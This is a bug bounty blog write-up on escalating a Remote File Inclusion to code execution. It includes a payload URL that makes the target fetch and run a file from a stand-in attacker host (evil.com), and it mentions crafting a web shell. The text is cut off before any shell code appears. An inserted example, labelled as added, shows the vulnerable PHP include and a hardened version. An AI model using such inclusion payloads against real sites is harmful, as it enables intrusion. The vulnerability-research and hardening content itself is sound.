How a Simple RFI Turned into a $300 RCE Jackpot - A Hacker's Wild Ride!
Introduction
Imagine sipping on coffee, casually testing a website, when suddenly - BAM! - you find an RFI vulnerability (Remote File Inclusion). Exciting, right? But what if that tiny spark of curiosity led you down a rabbit hole, turning into Remote Code Execution (RCE) and earning you a sweet $300 bug bounty? This is the story of how a simple vulnerability turned into an unforgettable hacking adventure!
Step 1: The Accidental Discovery
It all started on a lazy afternoon. I was exploring a bug bounty program when I stumbled upon a parameter in a URL:
**https://target.com/index.php?page=about.php**
This looked too good to be true! A page parameter? That screamed potential RFI. So, I did what any hacker would - I tested it!
Step 2: Exploiting the RFI
To confirm the vulnerability, I tried including a remote file:
**https://target.com/index.php?page=http://evil.com/shell.txt**
And guess what? The server fetched and executed my remote file! That was a huge win! But I wasn't stopping there.
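The server-side pattern that typically produces this behaviour, next to a hardened form, as an added example that is not part of the original post and not the target's actual code. The page names, the `pages/` directory and the `resolve_page` helper are assumptions for illustration, and the code requires PHP 8.

```php
<?php
// Added example: names and directory layout are assumptions, not the target's code.

// Pattern that yields the behaviour described above. The raw parameter goes
// straight into include, so with allow_url_include enabled in php.ini a URL
// is fetched and executed as PHP:
//   include $_GET['page'];

// Hardened form: the parameter only selects a key from a fixed map and never
// becomes part of a filesystem path or URL. Keep allow_url_include=0 as well.
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function resolve_page(mixed $requested, string $baseDir): ?string
{
    if (!is_string($requested)) {
        return null;                      // rejects page[]=... array input
    }
    // Accept the legacy "about.php" form as well as the bare key "about".
    $key = preg_replace('/\.php$/', '', $requested);
    if (!array_key_exists($key, PAGES)) {
        return null;                      // URLs, stream wrappers and ../ end here
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . PAGES[$key]);
    // Defence in depth: the resolved file must exist and live under $baseDir.
    if ($base === false || $path === false
        || !str_starts_with($path, $base . DIRECTORY_SEPARATOR)) {
        return null;
    }
    return $path;
}

$target = resolve_page($_GET['page'] ?? 'home', __DIR__ . '/pages');
if ($target === null) {
    http_response_code(404);
    exit('Not found');
}
include $target;
```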
Step 3: From RFI to RCE
Since the server executed my remote file, I crafted a simple PHP web shell: